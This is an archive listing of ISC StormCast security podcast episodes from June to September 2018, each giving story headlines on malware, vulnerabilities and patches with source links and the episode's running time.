ISC StormCast for Wednesday, September 19th 2018

Certificate Transparency Tools https://isc.sans.edu/forums/diary/Using+Certificate+Transparency+as+an+Attack+Defense+Tool/24114/ Kodi Malicious Add-Ons https://www.welivesecurity.com/2018/09/13/kodi-add-ons-launch-cryptomining-campaign/ Cloudflare Making DNSSEC Adoption Easier https://blog.cloudflare.com/automatically-provision-and-maintain-dnssec/ Western Digital MyCloud Unauthenticated Admin Access https://www.securify.nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html
9/19/2018, 5 minutes, 27 seconds

ISC StormCast for Tuesday, September 18th 2018

Analyzing Office Docs https://isc.sans.edu/forums/diary/Dissecting+Malicious+MS+Office+Docs/24108/ Apple Updates Everything but macOS https://support.apple.com/en-us/HT201220 FBot Botnet https://blog.netlab.360.com/threat-alert-a-new-worm-fbot-cleaning-adbminer-is-using-a-blockchain-based-dns-en/ Related STI Paper: Botnet Resiliency via Private Blockchain (Jonathan Sweeny) https://www.sans.org/reading-room/whitepapers/covert/botnet-resiliency-private-blockchains-38050
9/18/2018, 5 minutes, 26 seconds

ISC StormCast for Monday, September 17th 2018

Reversing Visual Basic Shortcuts https://isc.sans.edu/forums/diary/2020+malware+vision/24104/ Not So Random User Agent https://isc.sans.edu/forums/diary/User+Agent+String+uatoolsrandom/24102/ Safari DoS https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea Webroot SecureAnywhere macOS Vulnerability https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-16962--Webroot-SecureAnywhere-macOS-Kernel-Level-Memory-Corruption/ Intel Patches Management Engine Encryption Vulnerability http://blog.ptsecurity.com/2018/09/intel-me-encryption-vulnerability.html
9/17/2018, 5 minutes, 26 seconds

ISC StormCast for Friday, September 14th 2018

Malicious MHT Files https://isc.sans.edu/forums/diary/Malware+Delivered+Through+MHT+Files/24096/ Improved Coldboot Attack https://blog.f-secure.com/cold-boot-attacks/ SAP Patches https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993
9/14/2018, 5 minutes, 37 seconds

ISC StormCast for Thursday, September 13th 2018

So What is Going on With IPv4 Fragments these Days? https://isc.sans.edu/forums/diary/So+What+is+Going+on+With+IPv4+Fragments+these+Days/24092/ Magecart Javascript Injection Attacks https://www.bleepingcomputer.com/news/security/feedify-service-compromised-with-magecart-information-stealing-script/ Bypassing CSP using Polyglot JPEGs https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs
9/13/2018, 6 minutes, 47 seconds

ISC StormCast for Wednesday, September 12th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+September+Patch+Tuesday+Summary/24088/ Adobe Patches https://helpx.adobe.com/security.html Safari/Edge URL Bar Spoofing https://www.rafaybaloch.com/2018/09/apple-safari-microsoft-edge-browser.html Exploit Search Engine https://sploitus.com
9/12/2018, 4 minutes, 44 seconds

ISC StormCast for Tuesday, September 11th 2018

"findstr" used to extract malware from LNK files https://isc.sans.edu/forums/diary/What+is+dikona+or+glirote3/24084/ Tor Browser Javascript Vulnerability https://www.bleepingcomputer.com/news/security/exploit-affecting-tor-browser-burned-in-a-tweet/ Trend Micro App Leaks Data / Removed from Appstore https://forums.malwarebytes.com/topic/217353-get-rid-of-open-any-files-rar-support/?tab=comments#comment-1194838 Chrome removes Subdomains from URL Bar https://bugs.chromium.org/p/chromium/issues/detail?id=881410
9/10/2018, 4 minutes, 46 seconds

ISC StormCast for Sunday, September 9th 2018

Crypto Mining in a Windows Headless Browser https://isc.sans.edu/forums/diary/Crypto+Mining+in+a+Windows+Headless+Browser/24078/ MacOS Adware Doctor Stealing Browser History https://twitter.com/privacyis1st/status/1031428304543395840 https://objective-see.com/blog/blog_0x37.html VPN Applications with Privilege Escalation Vulnerabilities https://blog.talosintelligence.com/2018/09/vulnerability-spotlight-Multi-provider-VPN-Client-Privilege-Escalation.html Keybase Extension Allows Access By Scripts from Any Site https://palant.de/2018/09/06/keybase-our-browser-extension-subverts-our-encryption-but-why-should-we-care
9/9/2018, 6 minutes, 33 seconds

ISC StormCast for Friday, September 7th 2018

Malware Uses Powershell to Compile C# Code on the Fly https://isc.sans.edu/forums/diary/Malicious+PowerShell+Compiling+C+Code+on+the+Fly/24072/ Stealing WiFi Credentials in Google Chrome https://www.surecloud.com/sc-blog/wifi-hijacking DNS Spoofing and Certificate Authority Domain Validation https://www.theregister.co.uk/2018/09/06/boffins_break_cas_domain_validation/ Cisco Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=30#~Vulnerabilities
9/6/2018, 4 minutes, 43 seconds

ISC StormCast for Thursday, September 6th 2018

MEGA Chrome Extension Replaced with Password Stealer https://serhack.me/articles/mega-chrome-extension-hacked Python Package Installer May Execute Code https://github.com/mschwager/0wned Windows Scheduler Exploit Used in the Wild https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/ Where Have All My Certificates Gone? https://isc.sans.edu/forums/diary/Where+have+all+my+Certificates+gone+And+when+do+they+expire/24066/
9/5/2018, 5 minutes, 6 seconds

ISC StormCast for Wednesday, September 5th 2018

Some More Interesting MikroTik Router Exploits https://blog.netlab.360.com/7500-mikrotik-routers-are-forwarding-owners-traffic-to-the-attackers-how-is-yours-en/ Exposed .git Directories https://lynt.cz/blog/global-scan-exposed-git SSL Certificates Expose Tor Servers https://www.bleepingcomputer.com/news/security/public-ip-addresses-of-tor-sites-exposed-via-ssl-certificates/
9/4/2018, 5 minutes, 32 seconds

ISC StormCast for Tuesday, September 4th 2018

Reversing and Modifying the Medium Mobile App https://hackernoon.com/dont-publish-yet-reverse-engineering-the-medium-app-and-making-all-stories-in-it-free-48c8f2695687 Active Directory Leaks via Azure https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/ Google Restricts Tech Support Ads https://www.blog.google/products/ads/restricting-ads-third-party-tech-support-services/?mod=article_inline
9/4/2018, 4 minutes, 42 seconds

ISC StormCast for Sunday, September 2nd 2018

OSX/MacOS and the Dangers of Custom URL Schemes https://objective-see.com/blog/blog_0x38.html Philips e-Alert Vulnerability https://ics-cert.us-cert.gov/advisories/ICSA-18-242-01
9/2/2018, 4 minutes, 45 seconds

ISC StormCast for Friday, August 31st 2018

Cryptocoin Miners are More Popular Than Ever and Dominate in Attacks https://isc.sans.edu/forums/diary/Crypto+Mining+Is+More+Popular+Than+Ever/24050/ Cryptocoin Miners Deployed via Struts Vulnerability https://www.volexity.com/blog/2018/08/27/active-exploitation-of-new-apache-struts-vulnerability-cve-2018-11776-deploys-cryptocurrency-miner/ Mimecast Identifies Weaknesses in Existing Email Filters https://www.mimecast.com/resources/ebooks/dates/2018/7/the-state-of-email-security-2018-report/ Android Leaks Information to Processes https://wwws.nightwatchcybersecurity.com/2018/08/29/sensitive-data-exposure-via-wifi-broadcasts-in-android-os-cve-2018-9489/
8/30/2018, 5 minutes, 59 seconds

ISC StormCast for Thursday, August 30th 2018

More Octoprint Details https://isc.sans.edu/forums/diary/3D+Printers+in+The+Wild+What+Can+Go+Wrong/24044/ Packagist Remote Code Injection Vulnerability https://justi.cz/security/2018/08/28/packagist-org-rce.html More OpenSSH User Enumeration Issues http://seclists.org/oss-sec/2018/q3/180 Two new TPM Vulnerabilities https://www.usenix.org/system/files/conference/usenixsecurity18/sec18-han.pdf
8/29/2018, 6 minutes, 12 seconds

ISC StormCast for Wednesday, August 29th 2018

Microsoft Windows Task Scheduler Local Privilege Escalation Vulnerability https://www.kb.cert.org/vuls/id/906424 3D Printers Exposed to Internet https://isc.sans.edu/forums/diary/OctoPrint+3D+Web+Interfaces+EXPOSED+Port+5000+default/24038/ Firefox Nightly Build Removes Trust From Symantec Certificates https://bugzilla.mozilla.org/show_bug.cgi?id=1460062 https://bugzilla.mozilla.org/show_bug.cgi?id=1484006
8/28/2018, 5 minutes, 21 seconds

ISC StormCast for Tuesday, August 28th 2018

H-Worm Variant Notes Infection Date in Registry https://isc.sans.edu/forums/diary/When+was+this+machine+infected/24032/ CentOS / Ubuntu Turn Off Gnome "Bubblewrap" Sandbox https://www.bleepingcomputer.com/news/security/ubuntu-and-centos-are-undoing-a-gnome-security-feature/ Fortnite Android Arbitrary Code Install Vulnerability https://www.bleepingcomputer.com/news/security/ubuntu-and-centos-are-undoing-a-gnome-security-feature/
8/27/2018, 4 minutes, 27 seconds

ISC StormCast for Monday, August 27th 2018

Struts Exploits for CVE-2018-11776 on Github (there are more; just a sample) https://github.com/mazen160/struts-pwn_CVE-2018-11776 https://github.com/jiguang7/CVE-2018-11776 Publisher Malware https://isc.sans.edu/forums/diary/Microsoft+Publisher+Files+Delivering+Malware/24024/ https://isc.sans.edu/forums/diary/Microsoft+Publisher+malware+static+analysis/24026/ AT Commands https://atcommands.org/atdb/vendors Using a Microphone to Read Screen Content https://www.cs.tau.ac.il/~tromer/synesthesia/synesthesia.pdf
8/26/2018, 6 minutes, 2 seconds

ISC StormCast for Friday, August 24th 2018

Simple Phishing Through formcrafts.com https://isc.sans.edu/forums/diary/Simple+Phishing+Through+formcraftscom/24020/ Facebook's Onavo VPN removed from Apple AppStore https://www.wsj.com/articles/facebook-to-remove-data-security-app-from-apple-store-1534975340?mod=e2tw (paywall) https://medium.com/@chronic_9612/notes-on-analytics-and-tracking-in-onavo-protect-for-ios-904bdff346c0 Phishing False Alarm https://www.cnn.com/2018/08/23/politics/dnc-hack-false-alarm/index.html Fake Crypto Trading App Stealing Cryptocurrency From Mac Users https://www.businesswire.com/news/home/20180823005093/en/AppleJeus-Lazarus-Group-Hunts-Cryptocurrency-Exchanges-macOS Intel Simplifies Microcode License https://twitter.com/imadsousou/status/1032680311753072640
8/23/2018, 6 minutes, 9 seconds

ISC StormCast for Thursday, August 23rd 2018

New Critical Apache Struts Vulnerability (CVE-2018-11776) https://semmle.com/news/apache-struts-CVE-2018-11776 https://cwiki.apache.org/confluence/display/WW/S2-057 Hardening Apache Struts With SELinux https://doublepulsar.com/hardening-apache-struts-with-selinux-db3a9cd1a10c?gi=f23fc884264a Ghostscript Code Execution Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1640 Photoshop CC Patch https://helpx.adobe.com/security/products/photoshop/apsb18-28.html
8/22/2018, 5 minutes, 18 seconds

ISC StormCast for Wednesday, August 22nd 2018

Malicious DLL Loaded Through AutoIT https://isc.sans.edu/forums/diary/Malicious+DLL+Loaded+Through+AutoIT/24008/ Traefik Fixes TLS Private Key Exposure https://github.com/containous/traefik/issues/3651 TLS Certificates Survive Domain Ownership https://insecure.design Intel Microcode License Update Causes Problems for Debian Linux https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=906158#14
8/21/2018, 5 minutes, 19 seconds

ISC StormCast for Tuesday, August 21st 2018

Regular Expression DoS (ReDoS) in Javascript http://mp.binaervarianz.de/ReDoS_TR_Dec2017.pdf OpenSSH User Enumeration Update https://isc.sans.edu/forums/diary/OpenSSH+user+enumeration+CVE201815473/24004 Turning (Page) Tables Exploit Technique https://cdn2.hubspot.net/hubfs/487909/Turning%20(Page)%20Tables_Slides.pdf
8/20/2018, 5 minutes, 17 seconds

ISC StormCast for Monday, August 20th 2018

FragmentSmack Summary https://isc.sans.edu/forums/diary/Back+to+the+90s+FragmentSmack/23998/ HP Does Not Release Patches for Non-Windows Users https://www.intego.com/mac-security-blog/exclusive-hp-leaves-mac-users-vulnerable-to-fax-hacks/ More about VB Script 0-Day Vulnerability and "Dark Hotel" (Chinese only) https://ti.360.net/blog/articles/analyzing-attack-of-cve-2018-8373-and-darkhotel/ https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/ PHP Deserialization Vulnerability Code Execution https://cdn2.hubspot.net/hubfs/3853213/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-....pdf?
8/19/2018, 5 minutes, 53 seconds

ISC StormCast for Friday, August 17th 2018

Anonymize PCAPS https://isc.sans.edu/forums/diary/Truncating+Payloads+and+Anonymizing+PCAP+files/23990/ OpenSSH User Enumeration Vulnerability http://seclists.org/oss-sec/2018/q3/124 VoiceXML XML External Entity Vulnerability https://hackerone.com/reports/395296 Skimreaper Credit Card Skimmer Detector http://skimreaper.com
8/17/2018 (6 minutes, 34 seconds)
Episode Artwork

ISC StormCast for Thursday, August 16th 2018

Password Protected Word Documents Push AZORult and Hermes Ransomware https://isc.sans.edu/forums/diary/More+malspam+pushing+passwordprotected+Word+docs+for+AZORult+and+Hermes+Ransomware/23992/ Linux IP Fragmentation DoS https://www.kb.cert.org/vuls/id/641765 Scripting Mouse Clicks to Bypass macOS Security https://speakerdeck.com/patrickwardle/the-mouse-is-mightier-than-the-sword Concentration of Coinhive Miners https://arxiv.org/pdf/1808.00811.pdf
8/16/2018 (5 minutes, 45 seconds)
Episode Artwork

ISC StormCast for Wednesday, August 15th 2018

Microsoft Patch Tuesday Summary https://isc.sans.edu/forums/diary/Microsoft+August+2018+Patch+Tuesday/23986/ Oracle Database Patch http://www.oracle.com/technetwork/security-advisory/alert-cve-2018-3110-5032149.html Intel Fixes Three More CPU Flaws https://software.intel.com/security-software-guidance/software-guidance/l1-terminal-fault
8/15/2018 (6 minutes, 11 seconds)
Episode Artwork

ISC StormCast for Tuesday, August 14th 2018

New Sextortion Wave Using Partial Phone Numbers New Extortion Tricks: Now Including Your (Partial) Phone Number! Intel Releases Patch for Puma Modem Chips https://www.dslreports.com/forum/r32071020-Internet-Rogers-modem-router-rebooting-on-wan-scans-by-design https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-000097.html Bluetooth Low Energy Attack Tool https://github.com/virtualabs/btlejack Tesla Will Fix Cars if Researcher Breaks it While Hacking https://twitter.com/bitquark/status/1028373178421309440
8/14/2018 (5 minutes, 3 seconds)
Episode Artwork

ISC StormCast for Monday, August 13th 2018

VIA C3 "God Mode" https://github.com/xoreaxeaxeax/rosenbridge Apple MDM Vulnerability https://www.wired.com/story/mac-remote-hack-wifi-enterprise/ Peeking into MSG Files https://isc.sans.edu/forums/diary/Peeking+into+msg+files+revisited/23974/ Hunting SSL/TLS Clients Using JA3 https://isc.sans.edu/forums/diary/Hunting+SSLTLS+clients+using+JA3/23972/ Mobile Payment Terminal Vulnerabilities https://www.blackhat.com/us-18/briefings.html#for-the-love-of-money-finding-and-exploiting-vulnerabilities-in-mobile-point-of-sales-systems
8/13/2018 (6 minutes, 7 seconds)
Episode Artwork

ISC StormCast for Friday, August 10th 2018

Vulnerabilities in Pacemaker Programmer and Insulin Pumps https://arstechnica.com/information-technology/2018/08/lack-of-encryption-makes-hacks-on-life-saving-pacemakers-shockingly-easy/ "Panic Attacks" Against City Infrastructure https://www.bbc.com/news/technology-45128053 Kaspersky VPN Leaks DNS Traffic https://www.inputzero.io/2018/08/kaspersky-vpn-leaks-dns-address.html Osiris Dropper Uses Process Doppelgänging https://blog.malwarebytes.com/threat-analysis/2018/08/osiris-using-process-doppelganging/
8/10/2018 (5 minutes, 13 seconds)
Episode Artwork

ISC StormCast for Thursday, August 9th 2018

Homebrew Exposed GitHub Credentials https://brew.sh/2018/08/05/security-incident-disclosure/ WhatsApp Vulnerability https://research.checkpoint.com/fakesapp-a-vulnerability-in-whatsapp/ Netflix Releases Tool To Detect Cloud Credential Compromise https://medium.com/netflix-techblog/netflix-cloud-security-detecting-credential-compromise-in-aws-9493d6fd373a
8/9/2018 (5 minutes, 7 seconds)
Episode Artwork

ISC StormCast for Wednesday, August 8th 2018

Linux TCP DoS Vulnerability https://www.kb.cert.org/vuls/id/962459 Let's Encrypt Now Trusted By All Major Root CA Programs https://letsencrypt.org/2018/08/06/trusted-by-all-major-root-programs.html Android Updates https://source.android.com/security/bulletin/2018-08-01 OpenEMR Vulnerabilities https://insecurity.sh/assets/reports/openemr.pdf
8/8/2018 (5 minutes, 34 seconds)
Episode Artwork

ISC StormCast for Tuesday, August 7th 2018

Numeric Obfuscation https://isc.sans.edu/forums/diary/Numeric+obfuscation+another+example/23960/ Crestron Touchscreen Vulnerability https://blog.securitycompass.com/security-advisory-regarding-crestron-tsw-xx60-touch-panel-devices-9f1a71a926a5 Facebook Releases "Fizz" TLS 1.3 Library https://github.com/facebookincubator/fizz
8/7/2018 (5 minutes)
Episode Artwork

ISC StormCast for Monday, August 6th 2018

New WPA Attack https://hashcat.net/forum/thread-7717.html Fake Tech Support Uses More Intelligent Call Routing https://www.symantec.com/blogs/threat-intelligence/tech-support-scam-call-optimization HP Printer Updates https://support.hp.com/us-en/document/c06097712
8/6/2018 (5 minutes, 30 seconds)
Episode Artwork

ISC StormCast for Friday, August 3rd 2018

Malware in Animated GIF Files https://isc.sans.edu/forums/diary/DHLthemed+malspam+reveals+embedded+malware+in+animated+gif/23944/ MikroTik Miner Botnet https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-%E2%80%93-First-we-cryptojack-Brazil,-then-we-take-the-World-/ Microsoft Edge Vulnerability https://www.netsparker.com/blog/web-security/stealing-local-files-with-simple-html-file/
8/3/2018 (6 minutes, 30 seconds)
Episode Artwork

ISC StormCast for Thursday, August 2nd 2018

Facebook Smishing Attack https://isc.sans.edu/forums/diary/Facebook+Phishing+via+SMS/23940/ Port 52869 UPNP Attacks https://isc.sans.edu/forums/diary/When+Cameras+and+Routers+attack+Phones+Spike+in+CVE20148361+Exploits+Against+Port+52869/23942/ Microsoft Improves Account Security for Midterm Elections https://www.bleepingcomputer.com/news/microsoft/microsoft-accountguard-service-offers-protection-for-political-and-election-orgs/ Google Improves "Government Sponsored Attacks" Alert for GSuite https://9to5google.com/2018/08/01/g-suite-admins-government-based-attackers/
8/2/2018 (6 minutes, 26 seconds)
Episode Artwork

ISC StormCast for Wednesday, August 1st 2018

PowerShell Inside Certificates https://blog.nviso.be/2018/07/31/powershell-inside-a-certificate-part-1/ TEMPEST is Back http://youtu.be/BpNP9b3aIfY?a Big Star Labs Spyware https://adguard.com/en/blog/big-star-labs-spyware/
8/1/2018 (6 minutes, 24 seconds)
Episode Artwork

ISC StormCast for Tuesday, July 31st 2018

DOSFuscation Campaign https://isc.sans.edu/forums/diary/Malicious+Word+documents+using+DOSfuscation/23932/ Let's Encrypt Outage https://letsencrypt.status.io Malvertising Campaign Insides https://research.checkpoint.com/malvertising-campaign-based-secrets-lies/
7/31/2018 (6 minutes, 56 seconds)
Episode Artwork

ISC StormCast for Monday, July 30th 2018

Summary of Earnings in Recent Sextortion Attack https://isc.sans.edu/forums/diary/Sextortion+Follow+the+Money/23922/ Adware Distributed with Legitimate Applications https://www.bleepingcomputer.com/news/security/fake-websites-for-keepass-7zip-audacity-others-found-pushing-adware/ https://twitter.com/JusticeRage PDF Editor Supply Chain Exploit https://cloudblogs.microsoft.com/microsoftsecure/2018/07/26/attack-inception-compromised-supply-chain-within-a-supply-chain-poses-new-risks/
7/30/2018 (7 minutes, 10 seconds)
Episode Artwork

ISC StormCast for Friday, July 27th 2018

NetSpectre: Read Arbitrary Memory over the Network https://misc0110.net/web/files/netspectre.pdf Google Play Store Bans Crypto Miners https://play.google.com/about/developer-content-policy-print/ Japanese Calendar Issues https://blogs.msdn.microsoft.com/shawnste/2018/04/12/the-japanese-calendars-y2k-moment/ Multiple Vulnerabilities in Samsung SmartThings Hub https://blog.talosintelligence.com/2018/07/samsung-smartthings-vulns.html?m=1 Times Change and Your Training Data Should Too: The Effect of Training Data Recency on Twitter Classifiers. Ryan O'Grady https://www.sans.org/reading-room/whitepapers/artificialintelligence/times-change-training-data-too-effect-training-data-recency-twitter-classifiers-38500
7/27/2018 (15 minutes, 52 seconds)
Episode Artwork

ISC StormCast for Thursday, July 26th 2018

Etherscan.io XSS Vulnerability https://scotthelme.co.uk/xss-on-etherscan-io/ Tomcat Vulnerabilities Patched https://www.us-cert.gov/ncas/current-activity/2018/07/23/Apache-Releases-Security-Updates-Apache-Tomcat DNS over HTTPS Standard Finalized https://datatracker.ietf.org/wg/doh/about/ ERP Systems Targeted in Recent Attacks https://www.us-cert.gov/ncas/current-activity/2018/07/25/Malicious-Cyber-Activity-Targeting-ERP-Applications
7/26/2018 (5 minutes, 19 seconds)
Episode Artwork

ISC StormCast for Wednesday, July 25th 2018

Emotet Update https://isc.sans.edu/forums/diary/Recent+Emotet+activity/23908/ Clear Text Phone Tracking https://isc.sans.edu/forums/diary/Cell+Phone+Monitoring+Who+is+Watching+the+Watchers/23910/ Bluetooth Bug https://www.kb.cert.org/vuls/id/304725 Apache OpenWhisk Vulnerability https://www.puresec.io/blog/Apache_OpenWhisk_Mutability_Weakness?hs_preview=EpJUmSoY-5972289702
7/25/2018 (5 minutes, 13 seconds)
Episode Artwork

ISC StormCast for Tuesday, July 24th 2018

More Spectre https://arxiv.org/pdf/1807.07940.pdf July IE Patch Fixed Older Remote Code Exec. Bug http://blogs.360.cn/blog/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day/ Google Chrome 68 Released Today. HTTP sites marked as "insecure" https://support.google.com/chrome/a/answer/7679408?hl=en DNS Rebinding Vulnerability Common in IoT https://www.armis.com/dns-rebinding-exposes-half-a-billion-iot-devices-in-the-enterprise/
7/24/2018 (6 minutes, 21 seconds)
Episode Artwork

ISC StormCast for Monday, July 23rd 2018

New WebLogic Vulnerability Already Exploited https://isc.sans.edu/forums/diary/Weblogic+Exploit+Code+Made+Public+CVE20182893/23896/ Microsoft Edge Turns off XSS Protection https://portswigger.net/daily-swig/xss-protection-disappears-from-microsoft-edge Intel Management Engine Vulnerabilities https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00112.html User Tracking With TLS 1.2 Certificates http://tma.ifip.org/wordpress/wp-content/uploads/2017/06/tma2017_paper2.pdf
7/23/2018 (5 minutes, 15 seconds)
Episode Artwork

ISC StormCast for Friday, July 20th 2018

Cisco Patches https://tools.cisco.com/security/center/publicationListing.x Diqee Smart Vacuum Vulnerabilities http://en.diqee.com/goods/1994.html Instagram About To Release 2FA Update https://techcrunch.com/2018/07/17/instagram-2-factor/ Reporting Malicious Websites https://isc.sans.edu/forums/diary/Reporting+Malicious+Websites+in+2018/23892/
7/20/2018 (5 minutes, 14 seconds)
Episode Artwork

ISC StormCast for Thursday, July 19th 2018

Increase in scans for port 15454 https://isc.sans.edu/forums/diary/Request+for+Packets+Port+15454/23888/ Oracle Quarterly Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html Venmo Public Transaction API https://publicbydefault.fyi Credential Stuffing Responsible for Majority of Login Attempts http://info.shapesecurity.com/2018-Credential-Spill-Report-by-Shape-Security
7/19/2018 (5 minutes, 20 seconds)
Episode Artwork

ISC StormCast for Wednesday, July 18th 2018

Searching for Geographically Improbable Login Attempts https://isc.sans.edu/forums/diary/Searching+for+Geographically+Improbable+Login+Attempts/23882/ Typo3 CMS Update https://typo3.org/article/typo3-931-8717-and-7630-security-releases-published/ GitHub Expands Security Scanner to Python https://blog.github.com/2018-07-12-security-vulnerability-alerts-for-python/ Money Laundering Scheme Exposed by Open MongoDB Database https://kromtech.com/blog/security-center/digital-laundry
7/18/2018 (5 minutes, 25 seconds)
Episode Artwork

ISC StormCast for Tuesday, July 17th 2018

Encrypted SNI in TLS 1.3 https://tools.ietf.org/html/draft-rescorla-tls-esni-00 Microsoft to Retire "Delta Updates" https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/Windows-10-quality-updates-explained-amp-the-end-of-delta/ba-p/214426 Practical GPS Spoofing of Navigation Devices https://www.microsoft.com/en-us/research/uploads/prod/2018/06/security18gps.pdf
7/17/2018 (7 minutes, 54 seconds)
Episode Artwork

ISC StormCast for Monday, July 16th 2018

Processing JSON https://isc.sans.edu/forums/diary/Video+Retrieving+and+processing+JSON+data+BTC+example/23874/ Cryptocoin Mining Javascript (yet again) https://isc.sans.edu/forums/diary/Cryptominer+Delivered+Though+Compromized+JavaScript+File/23870/ Dahua Passwords Leaked/Cached by Search Engine https://www.bleepingcomputer.com/news/security/passwords-for-tens-of-thousands-of-dahua-devices-cached-in-iot-search-engine/ MDM Used in Targeted Attack Against iPhone Users https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html
7/16/2018 (7 minutes, 12 seconds)
Episode Artwork

ISC StormCast for Friday, July 13th 2018

Extortion Claims Include Leaked Passwords to Appear More Plausible https://isc.sans.edu/forums/diary/New+Extortion+Tricks+Now+Including+Your+Password/23866/ npm Package Compromised and Used To Steal Credentials https://github.com/eslint/eslint-scope/issues/39#issuecomment-404533026 CIRCL IMAP Proxy https://github.com/CIRCL/IMAP-Proxy Checkpoint Names "Dorkbot" As A Top Threat (Signup required) https://research.checkpoint.com/cyber-attack-trends-2018-mid-year-report/
7/13/2018 (5 minutes, 54 seconds)
Episode Artwork

ISC StormCast for Thursday, July 12th 2018

Hello Peppa Followup https://isc.sans.edu/forums/diary/Well+Hello+Again+Peppa/23860/ Spectre 1.1 and 1.2 https://people.csail.mit.edu/vlk/spectre11.pdf Internet Exchanges Band Together against BGP Hijacking https://dyn.com/blog/shutting-down-the-bgp-hijack-factory/ Google Enabled Site Isolation in Chrome https://www.bleepingcomputer.com/news/security/google-enables-site-isolation-feature-for-99-percent-of-chrome-desktop-users/
7/12/2018 (5 minutes, 46 seconds)
Episode Artwork

ISC StormCast for Wednesday, July 11th 2018

MSFT Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+July+2018+now+with+Dashboard/23858/ https://patchtuesdaydashboard.com/ SettingContent-ms Files Blacklisted https://support.office.com/en-us/article/packager-activation-in-office-365-desktop-applications-52808039-4a7c-4550-be3a-869dd338d834?ui=en-US&rs=en-US&ad=US Adobe Patches https://helpx.adobe.com/security.html Stolen DLINK Certificate https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/
7/11/2018 (6 minutes, 4 seconds)
Episode Artwork

ISC StormCast for Tuesday, July 10th 2018

Reverse Shell via Weblogic Flaw https://isc.sans.edu/forums/diary/Criminals+Dont+Read+Instructions+or+Use+Strong+Passwords/23850/ Apple Patches Everything Again https://isc.sans.edu/forums/diary/Apple+Patches+Everything+Again/23852/ Microsoft Offers Better Azure AD Password Protection http://www.longevitytech.us/2018/07/09/azure-ad-password-protection-the-cloud-security-service-your-active-directory-needs-now/
7/10/2018 (5 minutes, 43 seconds)
Episode Artwork

ISC StormCast for Monday, July 9th 2018

Trivial Exploit For HP iLO 4 (patched last August) https://airbus-seclab.github.io/ilo/SSTIC2018-Article-subverting_your_server_through_its_bmc_the_hpe_ilo4_case-gazet_perigaud_czarny.pdf Flexible Miner/Ransomware https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/ Hacker Steals Gas From Gas Station https://gizmodo.com/hackers-reportedly-stole-600-gallons-of-gas-from-detroi-1827433411
7/9/2018 (4 minutes, 22 seconds)
Episode Artwork

ISC StormCast for Friday, July 6th 2018

Gentoo GitHub Breach Post Mortem https://wiki.gentoo.org/wiki/Github/2018-06-28 Hamas Sets World Cup Trap for Israeli Soldiers https://www.reuters.com/article/us-israel-palestinians-cyber/israel-says-hamas-tried-to-snare-soldiers-in-world-cup-cyber-trap-idUSKBN1JT1ZX
7/6/2018 (5 minutes, 6 seconds)
Episode Artwork

ISC StormCast for Thursday, July 5th 2018

Progress Indication For Scripts in Windows https://isc.sans.edu/forums/diary/Progress+indication+for+scripts+on+Windows/23830/ Stylish Extension Steals History https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your-internet-history/ Data Leaks From Android Apps https://recon.meddle.mobi/panoptispy/
7/5/2018 (3 minutes, 13 seconds)

ISC StormCast for Tuesday, July 3rd 2018

Odd PHP Exploit Attempt https://isc.sans.edu/forums/diary/Hello+Peppa+PHP+Scans/23826/
Diameter Security Report https://www.ptsecurity.com/ww-en/premium/diameter-2018/
Attack Against Trezor via DNS or BGP https://blog.trezor.io/psa-phishing-alert-fake-trezor-wallet-website-3bcfdfc3eced
Symantec Offers VPNFilter Check http://www.symantec.com/filtercheck/
7/2/2018 5 minutes, 22 seconds

ISC StormCast for Monday, July 2nd 2018

MacOS Malware Targeting Slack/Discord Crypto Communities https://isc.sans.edu/forums/diary/Crypto+community+target+of+MacOS+malware/23816/
New LTE Attacks Made Public https://alter-attack.net
Rowhammer Attacks Against Android https://rampageattack.com
7/2/2018 6 minutes, 29 seconds

ISC StormCast for Friday, June 29th 2018

Less Greedy Cryptominers https://isc.sans.edu/forums/diary/New+and+Improved+Cryptominers+Now+with+50+less+Greed/23812/
Disassembling WebAssembly https://www.forcepoint.com/blog/security-labs/analyzing-webassembly-binaries
Spectre Browser Mitigation Bypass https://alephsecurity.com/2018/06/26/spectre-browser-query-cache/
Gentoo GitHub Repository Compromise https://archives.gentoo.org/gentoo-announce/message/dc23d48d2258e1ed91599a8091167002
6/29/2018 6 minutes, 1 second

ISC StormCast for Thursday, June 28th 2018

Secret Office 365 Activity Log API Unveiled (plus tool to extract logs) http://lmgsecurity.com/exposing-the-secret-office-365-forensics-tool/
Anonymizing Printers https://tu-dresden.de/ing/informatik/sya/ps/die-professur/news/geheime-daten-auf-dem-druckpapier-diplominformatiker-der-tu-dresden-entwickeln-verfahren-gegen-druckerueberwachung
Silently Profiling Unknown Malware Samples https://isc.sans.edu/forums/diary/Silently+Profiling+Unknown+Malware+Samples/23808/
Cisco CVE-2018-0296 Exploited https://www.bleepingcomputer.com/news/security/cisco-asa-flaw-exploited-in-the-wild-after-publication-of-two-pocs/
6/27/2018 7 minutes, 25 seconds

ISC StormCast for Wednesday, June 27th 2018

